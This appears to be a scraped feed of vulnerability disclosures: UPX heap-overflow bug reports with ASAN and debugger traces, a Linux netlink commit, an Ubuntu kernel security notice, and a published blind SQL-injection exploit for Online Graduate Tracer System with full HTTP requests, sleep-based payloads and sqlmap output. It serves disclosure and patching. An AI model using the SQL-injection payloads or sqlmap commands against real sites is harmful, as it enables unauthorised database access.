A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688.

**What's the problem (or question)?**

A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert\_pt\_dynamic at p\_lx\_elf.cpp:1688.

ASAN reports:

\==110358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000fed9 at pc 0x00000045acc8 bp 0x7ffd88c9b020 sp 0x7ffd88c9b010
READ of size 4 at 0x61600000fed9 thread T0
    #0 0x45acc7 in PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:1688
    #1 0x463ba5 in PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:1583
    #2 0x463ba5 in PackLinuxElf32::PackLinuxElf32help1(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:305
    #3 0x464e96 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.h:395
    #4 0x464e96 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4800
    #5 0x464e96 in PackBSDElf32x86::PackBSDElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4817
    #6 0x464e96 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4828
    #7 0x4f337a in PackMaster::visitAllPackers(Packer\* (\*)(Packer\*, void\*), InputFile\*, options\_t const\*, void\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:190
    #8 0x4f50f9 in PackMaster::getUnpacker(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
    #9 0x4f521f in PackMaster::unpack(OutputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
    #10 0x52a1e6 in do\_one\_file(char const\*, char\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
    #11 0x52a69e in do\_files(int, int, char\*\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
    #12 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
    #13 0x7ff33c8dc82f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #14 0x404828 in \_start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)

0x61600000fed9 is located 1 bytes to the right of 600-byte region \[0x61600000fc80,0x61600000fed8)
allocated by thread T0 here:
    #0 0x7ff33d4d0602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:1688 PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> \> const\*)
Shadow bytes around the buggy address:
  0x0c2c7fff9f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fff9f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff9fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c2c7fff9fd0: 00 00 00 00 00 00 00 00 00 00 00\[fa\]fa fa fa fa
  0x0c2c7fff9fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
\==110358\==ABORTING

Then analysis the reasons for segv by debugging:

Program received signal SIGSEGV, Segmentation fault.
0x0000000000527258 in PackLinuxElf32::invert\_pt\_dynamic (this=this@entry=0xa00030, dynp=<optimized out\>) at p\_lx\_elf.cpp:1688
1688                if (buckets\[j\]) {
\[ Legend: Modified register | Code | Heap | Stack | String \]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0000000000a009c1  →  0x00000000ffffffff
$rbx   : 0x0000000000a00030  →  0x00000000007267a0  →  <vtable+0> add BYTE PTR \[rax\], al
$rcx   : 0x0               
$rdx   : 0x0               
$rsp   : 0x00007fffffffcc10  →  0x0000000000a007c0  →  0xff0000010900457f
$rbp   : 0xffffff00        
$rsi   : 0x7d88            
$rdi   : 0x6               
$rip   : 0x0000000000527258  →  <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov r9d, DWORD PTR \[rax+rsi\*4+0x1c\]
$r8    : 0x0               
$r9    : 0x0               
$r10   : 0x10              
$r11   : 0x0               
$r12   : 0xd               
$r13   : 0xffffffff        
$r14   : 0x200             
$r15   : 0x0               
$eflags: \[carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification\]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcc10│+0x0000: 0x0000000000a007c0  →  0xff0000010900457f     ← $rsp
0x00007fffffffcc18│+0x0008: 0x0000000000000000
0x00007fffffffcc20│+0x0010: 0x00007ffff7352260  →  <read+16> cmp rax, 0xfffffffffffff001
0x00007fffffffcc28│+0x0018: 0x0000000000000258
0x00007fffffffcc30│+0x0020: 0x00007ffff7362447  →  <lseek64+7> cmp rax, 0xfffffffffffff001
0x00007fffffffcc38│+0x0028: 0x00000000005255b2  →  <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov rax, QWORD PTR \[rsp+0x10\]
0x00007fffffffcc40│+0x0030: 0x0000000000000000
0x00007fffffffcc48│+0x0038: 0x0000000000000000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x527247 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    rcx, QWORD PTR \[rsp+0x8\]
     0x52724c <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    rdx, QWORD PTR \[rsp\]
     0x527250 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> lea    rsp, \[rsp+0x98\]
 →   0x527258 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    r9d, DWORD PTR \[rax+rsi\*4+0x1c\]
     0x52725d <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> test   r9d, r9d
     0x527260 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> je     0x5272eb <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,  LE32,  LE32,  LE32,  LE32> \> const\*)+7515>
     0x527266 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> xchg   ax, ax
     0x527268 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> lea    rsp, \[rsp-0x98\]
     0x527270 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    QWORD PTR \[rsp\], rdx
───────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:p\_lx\_elf.cpp+1688 ────
   1683             unsigned     const \*const hasharr = &buckets\[n\_bucket\]; (void)hasharr;
   1684           //unsigned     const \*const gashend = &hasharr\[n\_bucket\];  // minimum, except:
   1685             // Rust and Android trim unused zeroes from high end of hasharr\[\]
   1686             unsigned bmax = 0;
   1687             for (unsigned j= 0; j < n\_bucket; ++j) {
 → 1688                 if (buckets\[j\]) {
   1689                     if (buckets\[j\] < symbias) {
   1690                         char msg\[50\]; snprintf(msg, sizeof(msg),
   1691                                 "bad DT\_GNU\_HASH bucket\[%d\] < symbias{%#x}\\n",
   1692                                 buckets\[j\], symbias);
   1693                         throwCantPack(msg);
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
\[#0\] Id 1, Name: "upx.out", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
\[#0\] 0x527258 → PackLinuxElf32::invert\_pt\_dynamic(this=0xa00030, dynp=<optimized out>)
\[#1\] 0x529294 → PackLinuxElf32::invert\_pt\_dynamic(dynp=<optimized out>, this=0xa00030)
\[#2\] 0x529294 → PackLinuxElf32::PackLinuxElf32help1(this=0xa00030, f=0x7fffffffce20)
\[#3\] 0x52c65e → PackLinuxElf32Le::PackLinuxElf32Le(f=0x7fffffffce20, this=0xa00030)
\[#4\] 0x52c65e → PackLinuxElf32x86::PackLinuxElf32x86(f=0x7fffffffce20, this=0xa00030)
\[#5\] 0x52c65e → PackBSDElf32x86::PackBSDElf32x86(f=0x7fffffffce20, this=0xa00030)
\[#6\] 0x52c65e → PackFreeBSDElf32x86::PackFreeBSDElf32x86(this=0xa00030, f=0x7fffffffce20)
\[#7\] 0x60448c → PackMaster::visitAllPackers(func=0x602c30 <try\_unpack(Packer\*, void\*)>, f=0x7fffffffce20, o=0x7fffffffcfd8, user=0x7fffffffce20)
\[#8\] 0x6072ca → PackMaster::getUnpacker(f=<optimized out>)
\[#9\] 0x6072ca → PackMaster::unpack(this=0x7fffffffcfc0, fo=0x7fffffffcef0)

The instruction to crash is, corresponds to the bucket \[j\] in the source code

mov    r9d, DWORD PTR \[rax+rsi\*4+0x1c\]

The value of register rax and rsi are:

$rax   : 0x0000000000a009c1
$rsi   : 0x7d88

The DWORD PTR pointer to 0xa1fffd, where the 0xa20000 is a invalid address.

gef➤  x /10xg 0xa1fffd
0xa1fffd:    Cannot access memory at address 0xa20000

**What should have happened?**

Decompress a crafted/suspicious file.

**Do you have an idea for a solution?**

A boundary check is needed for loop variable 'j' because the size allocated for variable 'buckets' is limited.

unsigned const \*const bitmask = (unsigned const \*)(void const \*)&gashtab\[4\];
unsigned     const \*const buckets = (unsigned const \*)&bitmask\[n\_bitmask\];
unsigned     const \*const hasharr = &buckets\[n\_bucket\]; (void)hasharr;
//unsigned     const \*const gashend = &hasharr\[n\_bucket\];  // minimum, except:
// Rust and Android trim unused zeroes from high end of hasharr\[\]
unsigned bmax = 0;
for (unsigned j= 0; j < n\_bucket; ++j) {
    if (buckets\[j\]) {

**How can we reproduce the issue?**

1.  compile upx with address-sanitize
2.  execute cmd

upx.out -df $PoC -o /dev/null

Poc can be found here.

**Please tell us details about your environment.**

*   UPX version used (upx --version):

upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43

*   Host Operating System and version:  
    Ubuntu 16.04 64-bit
*   Host CPU architecture:  
    Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
*   Target Operating System and version:  
    same as Host
*   Target CPU architecture:  
    same as Host

CVE-2021-43313: [bug]heap buffer overflow in PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688 · Issue #378 · upx/upx

A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le64().

**What's the problem (or question)?**

A heap-based buffer overflow was discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get\_le64(). The issue can cause a denial of service. The issue is diff from issue367 and issue368

ASAN reports:

ASAN:SIGSEGV
=================================================================
==113201==ERROR: AddressSanitizer: SEGV on unknown address 0x630011d04b20 (pc 0x0000005292e0 bp 0x000000000022 sp 0x7ffebc640bc8 T0)
    #0 0x5292df in get\_le64(void const\*) /home/test/Desktop/EVAULATION/upx/src/bele\_policy.h:193
    #1 0x5292df in N\_BELE\_RTP::LEPolicy::get64(void const\*) const /home/test/Desktop/EVAULATION/upx/src/bele\_policy.h:194
    #2 0x45784b in Packer::get\_te64(void const\*) const /home/test/Desktop/EVAULATION/upx/src/packer.h:297
    #3 0x45784b in PackLinuxElf64::elf\_lookup(char const\*) const /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:5423
    #4 0x46f7eb in PackLinuxElf64::PackLinuxElf64help1(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:805
    #5 0x470479 in PackLinuxElf64Le::PackLinuxElf64Le(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.h:407
    #6 0x470479 in PackLinuxElf64amd::PackLinuxElf64amd(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:1008
    #7 0x4f34b2 in PackMaster::visitAllPackers(Packer\* (\*)(Packer\*, void\*), InputFile\*, options\_t const\*, void\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:194
    #8 0x4f50f9 in PackMaster::getUnpacker(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
    #9 0x4f521f in PackMaster::unpack(OutputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
    #10 0x52a1e6 in do\_one\_file(char const\*, char\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
    #11 0x52a69e in do\_files(int, int, char\*\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
    #12 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
    #13 0x7fc4129b682f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #14 0x404828 in \_start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/Desktop/EVAULATION/upx/src/bele\_policy.h:193 get\_le64(void const\*)
==113201==ABORTING

The essential cause of the bug is at PackLinuxElf64 :: elf\_lookup () at p\_lx\_elf: 5423:

upx\_uint64\_t const w = get\_te64(&bitmask\[(n\_bitmask -1) & (h>>6)\]);

**What should have happened?**

Decompress a crafted/suspicious file.

**Do you have an idea for a solution?**

We are very grateful to @jreiser for patching the bucket in p\_lx\_elf.cpp in the issue 367. However, in fact, all places involving get\_te64 () should be strengthened in upx, especially in p\_lx\_elf.cpp. The position we reported should be patched at least:  
position in PackLinuxElf64::elf\_lookup() at p\_lx\_elf:5423

upx\_uint64\_t const w = get\_te64(&bitmask\[(n\_bitmask -1) & (h>>6)\]);

**How can we reproduce the issue?**

1.  compile upx with address-sanitize
2.  execute cmd

upx.out -df $PoC -o /dev/null

Poc can be found here.

**Please tell us details about your environment.**

*   UPX version used (upx --version):

upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43

*   Host Operating System and version:  
    Ubuntu 16.04 64-bit
*   Host CPU architecture:  
    Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
*   Target Operating System and version:  
    same as Host
*   Target CPU architecture:  
    same as Host

CVE-2021-43316: [bug] segv fault in get_le64() · Issue #381 · upx/upx

An issue was discovered in the Linux kernel before 5.8. lib/nlattr.c allows attackers to cause a denial of service (unbounded recursion) via a nested Netlink policy with a back reference.

Permalink

Browse files

netlink: limit recursion depth in policy validation

Now that we have nested policies, we can theoretically
recurse forever parsing attributes if a (sub-)policy
refers back to a higher level one. This is a situation
that has happened in nl80211, and we've avoided it there
by not linking it.

Add some code to netlink parsing to limit recursion depth.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>

*   Loading branch information

CVE-2020-36691: netlink: limit recursion depth in policy validation · torvalds/linux@7690aa1

Ubuntu Security Notice 5970-1 - It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs. It was discovered that a race condition existed in the Xen network backend driver in the Linux kernel when handling dropped packets in certain circumstances. An attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5970-1March 23, 2023linux, linux-aws, linux-azure, linux-gcp, linux-ibm, linux-kvm,linux-lowlatency, linux-oracle, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the KVM VMX implementation in the Linux kernel didnot properly handle indirect branch prediction isolation between L1 and L2VMs. An attacker in a guest VM could use this to expose sensitiveinformation from the host OS or other guest VMs. (CVE-2022-2196)It was discovered that a race condition existed in the Xen network backenddriver in the Linux kernel when handling dropped packets in certaincircumstances. An attacker could use this to cause a denial of service(kernel deadlock). (CVE-2022-42328, CVE-2022-42329)Gerald Lee discovered that the USB Gadget file system implementation in theLinux kernel contained a race condition, leading to a use-after-freevulnerability in some situations. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2022-4382)José Oliveira and Rodrigo Branco discovered that the prctl syscallimplementation in the Linux kernel did not properly protect againstindirect branch prediction attacks in some situations. A local attackercould possibly use this to expose sensitive information. (CVE-2023-0045)It was discovered that a use-after-free vulnerability existed in theAdvanced Linux Sound Architecture (ALSA) subsystem. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2023-0266)It was discovered that the io_uring subsystem in the Linux kernel containeda use-after-free vulnerability. A local attacker could possibly use this tocause a denial of service (system crash) or execute arbitrary code.(CVE-2023-0469)It was discovered that the CIFS network file system implementation in theLinux kernel contained a user-after-free vulnerability. A local attackercould possibly use this to cause a denial of service (system crash) orexecute arbitrary code. (CVE-2023-1195)It was discovered that the RNDIS USB driver in the Linux kernel containedan integer overflow vulnerability. A local attacker with physical accesscould plug in a malicious USB device to cause a denial of service (systemcrash) or possibly execute arbitrary code. (CVE-2023-23559)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   linux-image-5.19.0-1015-raspi   5.19.0-1015.22   linux-image-5.19.0-1015-raspi-nolpae  5.19.0-1015.22   linux-image-5.19.0-1019-gcp     5.19.0-1019.21   linux-image-5.19.0-1019-ibm     5.19.0-1019.21   linux-image-5.19.0-1019-oracle  5.19.0-1019.22   linux-image-5.19.0-1020-kvm     5.19.0-1020.21   linux-image-5.19.0-1021-lowlatency  5.19.0-1021.22   linux-image-5.19.0-1021-lowlatency-64k  5.19.0-1021.22   linux-image-5.19.0-1022-aws     5.19.0-1022.23   linux-image-5.19.0-1022-azure   5.19.0-1022.23   linux-image-5.19.0-38-generic   5.19.0-38.39   linux-image-5.19.0-38-generic-64k  5.19.0-38.39   linux-image-5.19.0-38-generic-lpae  5.19.0-38.39   linux-image-aws                 5.19.0.1022.19   linux-image-azure               5.19.0.1022.18   linux-image-gcp                 5.19.0.1019.16   linux-image-generic             5.19.0.38.34   linux-image-generic-64k         5.19.0.38.34   linux-image-generic-lpae        5.19.0.38.34   linux-image-ibm                 5.19.0.1019.16   linux-image-kvm                 5.19.0.1020.17   linux-image-lowlatency          5.19.0.1021.17   linux-image-lowlatency-64k      5.19.0.1021.17   linux-image-oracle              5.19.0.1019.16   linux-image-raspi               5.19.0.1015.14   linux-image-raspi-nolpae        5.19.0.1015.14   linux-image-virtual             5.19.0.38.34After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5970-1   CVE-2022-2196, CVE-2022-42328, CVE-2022-42329, CVE-2022-4382,   CVE-2023-0045, CVE-2023-0266, CVE-2023-0469, CVE-2023-1195,   CVE-2023-23559Package Information:   https://launchpad.net/ubuntu/+source/linux/5.19.0-38.39   https://launchpad.net/ubuntu/+source/linux-aws/5.19.0-1022.23   https://launchpad.net/ubuntu/+source/linux-azure/5.19.0-1022.23   https://launchpad.net/ubuntu/+source/linux-gcp/5.19.0-1019.21   https://launchpad.net/ubuntu/+source/linux-ibm/5.19.0-1019.21   https://launchpad.net/ubuntu/+source/linux-kvm/5.19.0-1020.21   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.19.0-1021.22   https://launchpad.net/ubuntu/+source/linux-oracle/5.19.0-1019.22   https://launchpad.net/ubuntu/+source/linux-raspi/5.19.0-1015.22

Ubuntu Security Notice USN-5970-1

Online Graduate Tracer System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Graduate Tracer System - Multiple SQLi# Date: 24/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the fill-in forms of Online Graduate Tracer System allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "age" parameter. ## Request PoC```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```This request causes a Fatal error. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "age" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 10 command works. ```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'%2b(select*from(select(sleep(10)))a)%2b'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/sts]└─# sqlmap -r sqli.txt -p 'age' --batch --dbs --level=3 --risk=2---snip---[01:53:49] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'POST parameter 'age' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 630 HTTP(s) requests:---Parameter: age (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: fullname=TKeljbcD&age=24' RLIKE (SELECT (CASE WHEN (6534=6534) THEN 24 ELSE 0x28 END)) AND 'ATRa'='ATRa&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 9933 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(9933=9933,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PwMK'='PwMK&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 7274 FROM (SELECT(SLEEP(5)))gxIn) AND 'maqj'='maqj&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=---[01:53:50] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)---snip---```## The "barangay", "batch", "company", "country", "course", "cs", "dob", "email", "estatus", "facebook", "fullname", "income", "location", "mincome", "municipal", "nature", "number", "organization", "phonenumber", "profession", "province", "region", "relate", "religion", "sex", "sreason", "status", "street", "twitter", "type" and "zipcode" parameters in the POST requests are also vulnerable. They can be exploited in the same way.

Online Graduate Tracer System 1.0 SQL Injection

Sales Tracker Management System version 1.0 suffers from a cross site scripting vulnerability.

